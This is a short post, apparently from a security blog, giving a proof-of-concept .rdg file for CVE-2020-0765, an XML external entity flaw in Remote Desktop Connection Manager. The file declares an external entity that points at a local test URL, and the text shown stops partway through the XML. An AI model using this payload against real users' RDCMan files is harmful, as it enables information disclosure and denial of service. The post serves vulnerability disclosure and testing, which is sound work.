March 11, 2020

CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without considering DTD and entity handling, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">]>
<RDCMan programVersion="2.7" schemaVersion="3">
    <credentialsProfiles />
  <connected />
  <favorites />
  <recentlyUsed />